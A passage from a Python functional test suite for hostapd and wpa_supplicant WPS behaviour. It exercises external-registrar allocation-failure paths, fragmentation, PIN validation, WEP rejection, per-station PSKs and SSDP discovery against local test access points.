ev = dev[0].wait_event([ "WPS-ER-AP-ADD", "CTRL-EVENT-CONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP discovery or connection timed out")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_cache_ap_settings_oom2(dev, apdev):
"""WPS ER caching AP settings (OOM 2)"""
try:
_test_ap_wps_er_cache_ap_settings_oom2(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_cache_ap_settings_oom2(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
with alloc_fail(dev[0], 1, "=wps_er_ap_cache_settings"):
hapd.disable()
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-REMOVE",
"CTRL-EVENT-DISCONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP removal or disconnection timed out")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-ADD", "CTRL-EVENT-CONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP discovery or connection timed out")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_subscribe_oom(dev, apdev):
"""WPS ER subscribe OOM"""
try:
_test_ap_wps_er_subscribe_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_subscribe_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
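    # Force the first allocation to fail in http_client_addr() when called from
    # wps_er_subscribe() to exercise the ER subscription OOM path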
with alloc_fail(dev[0], 1, "http_client_addr;wps_er_subscribe"):
dev[0].request("WPS_ER_START ifname=lo")
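        # Poll GET_ALLOC_FAIL until the forced allocation failure has been
        # consumed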
for i in range(50):
res = dev[0].request("GET_ALLOC_FAIL")
if res.startswith("0:"):
break
time.sleep(0.1)
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=0)
if ev:
raise Exception("Unexpected AP discovery during OOM")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_set_sel_reg_oom(dev, apdev):
"""WPS ER SetSelectedRegistrar OOM"""
try:
_test_ap_wps_er_set_sel_reg_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_set_sel_reg_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("AP not discovered")
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL timed out")
time.sleep(0.1)
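    # Trigger allocation failures at various points in the SetSelectedRegistrar
    # code path; each WPS_ER_PBC attempt should still be handled cleanly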
for func in [ "http_client_url_parse;wps_er_send_set_sel_reg",
"wps_er_soap_hdr;wps_er_send_set_sel_reg",
"http_client_addr;wps_er_send_set_sel_reg",
"wpabuf_alloc;wps_er_set_sel_reg" ]:
with alloc_fail(dev[0], 1, func):
if "OK" not in dev[0].request("WPS_ER_PBC " + ap_uuid):
raise Exception("WPS_ER_PBC failed")
ev = dev[0].wait_event(["WPS-PBC-ACTIVE"], timeout=3)
if ev is None:
raise Exception("WPS-PBC-ACTIVE not seen")
dev[0].request("WPS_ER_STOP")
@remote_compatible
def test_ap_wps_er_learn_oom(dev, apdev):
"""WPS ER learn OOM"""
try:
_test_ap_wps_er_learn_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_learn_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("AP not discovered")
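    # Force allocation failures at different stages of the AP learn exchange;
    # WPS_ER_LEARN is expected to fail cleanly under OOM and then succeed once
    # allocations work again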
for func in [ "wps_er_http_put_message_cb",
"xml_get_base64_item;wps_er_http_put_message_cb",
"http_client_url_parse;wps_er_ap_put_message",
"wps_er_soap_hdr;wps_er_ap_put_message",
"http_client_addr;wps_er_ap_put_message" ]:
with alloc_fail(dev[0], 1, func):
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=1)
if ev is not None:
raise Exception("AP learn succeeded during OOM")
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=10)
if ev is None:
raise Exception("AP learn did not succeed")
if "FAIL" not in dev[0].request("WPS_ER_LEARN 00000000-9e5c-4e73-bd82-f89cbcd10d7e " + ap_pin):
raise Exception("WPS_ER_LEARN for unknown AP accepted")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_fragmentation(dev, apdev):
"""WPS with fragmentation in EAP-WSC and mixed mode WPA+WPA2"""
ssid = "test-wps-fragmentation"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "3",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wpa_pairwise": "TKIP", "ap_pin": appin,
"fragment_size": "50" })
logger.info("WPS provisioning step (PBC)")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].request("SET wps_fragment_size 50")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("WPS provisioning step (PIN)")
pin = dev[1].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].request("SET wps_fragment_size 50")
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[1].wait_connected(timeout=30)
status = dev[1].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("WPS connection as registrar")
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].request("SET wps_fragment_size 50")
dev[2].wps_reg(apdev[0]['bssid'], appin)
status = dev[2].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
@remote_compatible
def test_ap_wps_new_version_sta(dev, apdev):
"""WPS compatibility with new version number on the station"""
ssid = "test-wps-ver"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
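    # Advertise a hypothetical future WPS version (0x43 = version 4.3) and an
    # extra vendor extension in M1; the AP should still complete provisioning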
dev[0].request("SET wps_version_number 0x43")
dev[0].request("SET wps_vendor_ext_m1 000137100100020001")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
@remote_compatible
def test_ap_wps_new_version_ap(dev, apdev):
"""WPS compatibility with new version number on the AP"""
ssid = "test-wps-ver"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
logger.info("WPS provisioning step")
if "FAIL" in hapd.request("SET wps_version_number 0x43"):
raise Exception("Failed to enable test functionality")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
hapd.request("SET wps_version_number 0x20")
@remote_compatible
def test_ap_wps_check_pin(dev, apdev):
"""Verify PIN checking through control interface"""
hapd = hostapd.add_ap(apdev[0],
{ "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
for t in [ ("12345670", "12345670"),
("12345678", "FAIL-CHECKSUM"),
("12345", "FAIL"),
("123456789", "FAIL"),
("1234-5670", "12345670"),
("1234 5670", "12345670"),
("1-2.3:4 5670", "12345670") ]:
res = hapd.request("WPS_CHECK_PIN " + t[0]).rstrip('\n')
res2 = dev[0].request("WPS_CHECK_PIN " + t[0]).rstrip('\n')
if res != res2:
raise Exception("Unexpected difference in WPS_CHECK_PIN responses")
if res != t[1]:
raise Exception("Incorrect WPS_CHECK_PIN response {} (expected {})".format(res, t[1]))
if "FAIL" not in hapd.request("WPS_CHECK_PIN 12345"):
raise Exception("Unexpected WPS_CHECK_PIN success")
if "FAIL" not in hapd.request("WPS_CHECK_PIN 123456789"):
raise Exception("Unexpected WPS_CHECK_PIN success")
for i in range(0, 10):
pin = dev[0].request("WPS_PIN get")
rpin = dev[0].request("WPS_CHECK_PIN " + pin).rstrip('\n')
if pin != rpin:
raise Exception("Random PIN validation failed for " + pin)
def test_ap_wps_pin_get_failure(dev, apdev):
"""PIN generation failure"""
with fail_test(dev[0], 1,
"os_get_random;wpa_supplicant_ctrl_iface_wps_pin"):
if "FAIL" not in dev[0].request("WPS_PIN get"):
raise Exception("WPS_PIN did not report failure")
def test_ap_wps_wep_config(dev, apdev):
"""WPS 2.0 AP rejecting WEP configuration"""
ssid = "test-wps-config"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"ap_pin": appin})
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin, "wps-new-ssid-wep", "OPEN", "WEP",
"hello", no_wait=True)
ev = hapd.wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL timed out")
if "reason=2" not in ev:
raise Exception("Unexpected reason code in WPS-FAIL")
status = hapd.request("WPS_GET_STATUS")
if "Last WPS result: Failed" not in status:
raise Exception("WPS failure result not shown correctly")
if "Failure Reason: WEP Prohibited" not in status:
raise Exception("Failure reason not reported correctly")
if "Peer Address: " + dev[0].p2p_interface_addr() not in status:
raise Exception("Peer address not shown correctly")
def test_ap_wps_wep_enroll(dev, apdev):
"""WPS 2.0 STA rejecting WEP configuration"""
ssid = "test-wps-wep"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"skip_cred_build": "1", "extra_cred": "wps-wep-cred" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL event timed out")
if "msg=12" not in ev or "reason=2 (WEP Prohibited)" not in ev:
raise Exception("Unexpected WPS-FAIL event: " + ev)
@remote_compatible
def test_ap_wps_ie_fragmentation(dev, apdev):
"""WPS AP using fragmented WPS IE"""
ssid = "test-wps-ie-fragmentation"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "1234567890abcdef1234567890abcdef",
"manufacturer": "1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef",
"model_name": "1234567890abcdef1234567890abcdef",
"model_number": "1234567890abcdef1234567890abcdef",
"serial_number": "1234567890abcdef1234567890abcdef" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
bss = dev[0].get_bss(apdev[0]['bssid'])
if "wps_device_name" not in bss or bss['wps_device_name'] != "1234567890abcdef1234567890abcdef":
logger.info("Device Name not received correctly")
logger.info(bss)
        # This can fail if the Probe Response frame is missed and the Beacon
        # frame was used to fill in the BSS entry. This can happen, e.g.,
        # under heavy load every now and then and is not really an error, so
        # try to work around it by running another scan.
dev[0].scan(freq="2412", only_new=True)
bss = dev[0].get_bss(apdev[0]['bssid'])
if not bss or "wps_device_name" not in bss or bss['wps_device_name'] != "1234567890abcdef1234567890abcdef":
logger.info(bss)
raise Exception("Device Name not received correctly")
if len(re.findall("dd..0050f204", bss['ie'])) != 2:
raise Exception("Unexpected number of WPS IEs")
def get_psk(pskfile):
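    """Parse a hostapd wpa_psk_file into a dict mapping MAC address to PSK"""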
psks = {}
with open(pskfile, "r") as f:
lines = f.read().splitlines()
for l in lines:
if l == "# WPA PSKs":
continue
        (addr, psk) = l.split(' ')
psks[addr] = psk
return psks
def test_ap_wps_per_station_psk(dev, apdev):
"""WPS PBC provisioning with per-station PSK"""
addr0 = dev[0].own_addr()
addr1 = dev[1].own_addr()
addr2 = dev[2].own_addr()
ssid = "wps"
appin = "12345670"
pskfile = "/tmp/ap_wps_per_enrollee_psk.psk_file"
try:
os.remove(pskfile)
except:
pass
hapd = None
try:
with open(pskfile, "w") as f:
f.write("# WPA PSKs\n")
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa": "2", "wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": "CCMP", "ap_pin": appin,
"wpa_psk_file": pskfile }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("First enrollee")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
logger.info("Second enrollee")
hapd.request("WPS_PBC")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
dev[1].wait_connected(timeout=30)
logger.info("External registrar")
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].wps_reg(apdev[0]['bssid'], appin)
logger.info("Verifying PSK results")
psks = get_psk(pskfile)
if addr0 not in psks:
raise Exception("No PSK recorded for sta0")
if addr1 not in psks:
raise Exception("No PSK recorded for sta1")
if addr2 not in psks:
raise Exception("No PSK recorded for sta2")
if psks[addr0] == psks[addr1]:
raise Exception("Same PSK recorded for sta0 and sta1")
if psks[addr0] == psks[addr2]:
raise Exception("Same PSK recorded for sta0 and sta2")
if psks[addr1] == psks[addr2]:
raise Exception("Same PSK recorded for sta1 and sta2")
dev[0].request("REMOVE_NETWORK all")
logger.info("Second external registrar")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
psks2 = get_psk(pskfile)
if addr0 not in psks2:
raise Exception("No PSK recorded for sta0(reg)")
if psks[addr0] == psks2[addr0]:
raise Exception("Same PSK recorded for sta0(enrollee) and sta0(reg)")
finally:
os.remove(pskfile)
if hapd:
dev[0].request("DISCONNECT")
dev[1].request("DISCONNECT")
dev[2].request("DISCONNECT")
hapd.disable()
dev[0].flush_scan_cache()
dev[1].flush_scan_cache()
dev[2].flush_scan_cache()
def test_ap_wps_per_station_psk_failure(dev, apdev):
"""WPS PBC provisioning with per-station PSK (file not writable)"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
ssid = "wps"
appin = "12345670"
pskfile = "/tmp/ap_wps_per_enrollee_psk.psk_file"
try:
os.remove(pskfile)
except:
pass
hapd = None
try:
with open(pskfile, "w") as f:
f.write("# WPA PSKs\n")
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa": "2", "wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": "CCMP", "ap_pin": appin,
"wpa_psk_file": pskfile }
hapd = hostapd.add_ap(apdev[0], params)
if "FAIL" in hapd.request("SET wpa_psk_file /tmp/does/not/exists/ap_wps_per_enrollee_psk_failure.psk_file"):
raise Exception("Failed to set wpa_psk_file")
logger.info("First enrollee")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
logger.info("Second enrollee")
hapd.request("WPS_PBC")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
dev[1].wait_connected(timeout=30)
logger.info("External registrar")
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].wps_reg(apdev[0]['bssid'], appin)
logger.info("Verifying PSK results")
psks = get_psk(pskfile)
if len(psks) > 0:
raise Exception("PSK recorded unexpectedly")
finally:
if hapd:
for i in range(3):
dev[i].request("DISCONNECT")
hapd.disable()
for i in range(3):
dev[i].flush_scan_cache()
os.remove(pskfile)
def test_ap_wps_pin_request_file(dev, apdev):
"""WPS PIN provisioning with configured AP"""
ssid = "wps"
pinfile = "/tmp/ap_wps_pin_request_file.log"
if os.path.exists(pinfile):
os.remove(pinfile)
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wps_pin_requests": pinfile,
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
uuid = dev[0].get_status_field("uuid")
pin = dev[0].wps_read_pin()
try:
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["WPS-PIN-NEEDED"], timeout=15)
if ev is None:
raise Exception("PIN needed event not shown")
if uuid not in ev:
raise Exception("UUID mismatch")
dev[0].request("WPS_CANCEL")
success = False
with open(pinfile, "r") as f:
lines = f.readlines()
for l in lines:
if uuid in l:
success = True
break
if not success:
raise Exception("PIN request entry not in the log file")
finally:
try:
os.remove(pinfile)
except:
pass
def test_ap_wps_auto_setup_with_config_file(dev, apdev):
"""WPS auto-setup with configuration file"""
conffile = "/tmp/ap_wps_auto_setup_with_config_file.conf"
ifname = apdev[0]['ifname']
try:
with open(conffile, "w") as f:
f.write("driver=nl80211\n")
f.write("hw_mode=g\n")
f.write("channel=1\n")
f.write("ieee80211n=1\n")
f.write("interface=%s\n" % ifname)
f.write("ctrl_interface=/var/run/hostapd\n")
f.write("ssid=wps\n")
f.write("eap_server=1\n")
f.write("wps_state=1\n")
hapd = hostapd.add_bss(apdev[0], ifname, conffile)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
with open(conffile, "r") as f:
lines = f.read().splitlines()
vals = dict()
for l in lines:
try:
                [name, value] = l.split('=', 1)
vals[name] = value
except ValueError as e:
if "# WPS configuration" in l:
pass
else:
raise Exception("Unexpected configuration line: " + l)
if vals['ieee80211n'] != '1' or vals['wps_state'] != '2' or "WPA-PSK" not in vals['wpa_key_mgmt']:
raise Exception("Incorrect configuration: " + str(vals))
finally:
try:
os.remove(conffile)
except:
pass
def test_ap_wps_pbc_timeout(dev, apdev, params):
"""wpa_supplicant PBC walk time and WPS ER SelReg timeout [long]"""
if not params['long']:
raise HwsimSkip("Skip test case with long duration due to --long not specified")
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
ctrlurl = urlparse(urls['control_url'])
url = urlparse(location)
conn = HTTPConnection(url.netloc)
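    # Minimal handler for the UPnP event callback URL; it logs the incoming
    # notification and replies with a canned response from gen_wps_event()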
class WPSERHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip()
logger.debug(data)
self.wfile.write(gen_wps_event())
server = MyTCPServer(("127.0.0.1", 12345), WPSERHTTPServer)
server.timeout = 1
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
msg = '''<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetSelectedRegistrar xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewMessage>EEoAARAQQQABARASAAIAABBTAAIxSBBJAA4ANyoAASABBv///////xBIABA2LbR7pTpRkYj7
VFi5hrLk
</NewMessage>
</u:SetSelectedRegistrar>
</s:Body>
</s:Envelope>'''
headers = { "Content-type": 'text/xml; charset="utf-8"' }
headers["SOAPAction"] = '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#%s"' % "SetSelectedRegistrar"
conn.request("POST", ctrlurl.path, msg, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
server.handle_request()
logger.info("Start WPS_PBC and wait for PBC walk time expiration")
if "OK" not in dev[0].request("WPS_PBC"):
raise Exception("WPS_PBC failed")
start = os.times()[4]
server.handle_request()
dev[1].request("BSS_FLUSH 0")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True,
only_new=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
logger.debug("BSS: " + str(bss))
if '[WPS-AUTH]' not in bss['flags']:
raise Exception("WPS not indicated authorized")
server.handle_request()
wps_timeout_seen = False
while True:
hapd.dump_monitor()
dev[1].dump_monitor()
if not wps_timeout_seen:
ev = dev[0].wait_event(["WPS-TIMEOUT"], timeout=0)
if ev is not None:
logger.info("PBC timeout seen")
wps_timeout_seen = True
else:
dev[0].dump_monitor()
now = os.times()[4]
if now - start > 130:
raise Exception("Selected registration information not removed")
dev[1].request("BSS_FLUSH 0")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True,
only_new=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
logger.debug("BSS: " + str(bss))
if '[WPS-AUTH]' not in bss['flags']:
break
server.handle_request()
server.server_close()
if wps_timeout_seen:
return
now = os.times()[4]
if now < start + 150:
dur = start + 150 - now
else:
dur = 1
logger.info("Continue waiting for PBC timeout (%d sec)" % dur)
ev = dev[0].wait_event(["WPS-TIMEOUT"], timeout=dur)
if ev is None:
raise Exception("WPS-TIMEOUT not reported")
def add_ssdp_ap(ap, ap_uuid):
ssid = "wps-ssdp"
ap_pin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo",
"friendly_name": "WPS Access Point",
"manufacturer_url": "http://www.example.com/",
"model_description": "Wireless Access Point",
"model_url": "http://www.example.com/model/",
"upc": "123456789012" }
return hostapd.add_ap(ap, params)
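# add_ssdp_ap() brings up a WPS-configured AP with an AP PIN set (for
# external registrar use) and the UPnP interface bound to loopback
# (upnp_iface=lo), so the SSDP/UPnP test cases below can reach hostapd's WPS
# UPnP server via the LOCATION URL discovered over multicast.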
def ssdp_send(msg, no_recv=False):
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
if no_recv:
return None
return sock.recv(1000).decode()
def ssdp_send_msearch(st, no_recv=False):
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'MAN: "ssdp:discover"',
'ST: ' + st,
'', ''])
return ssdp_send(msg, no_recv=no_recv)
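# For reference, the M-SEARCH built above looks roughly like this on the
# wire (CRLF line endings, with an empty line terminating the headers):
#
#   M-SEARCH * HTTP/1.1
#   HOST: 239.255.255.250:1900
#   MX: 1
#   MAN: "ssdp:discover"
#   ST: <search target>
#
# A WPS AP is expected to answer with a unicast "HTTP/1.1 200 OK" message
# carrying a LOCATION header that points at its UPnP device description.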
def test_ap_wps_ssdp_msearch(dev, apdev):
"""WPS AP and SSDP M-SEARCH messages"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'Host: 239.255.255.250:1900',
'Mx: 1',
'Man: "ssdp:discover"',
'St: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
ssdp_send(msg)
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'host:\t239.255.255.250:1900\t\t\t\t \t\t',
'mx: \t1\t\t ',
'man: \t \t "ssdp:discover" ',
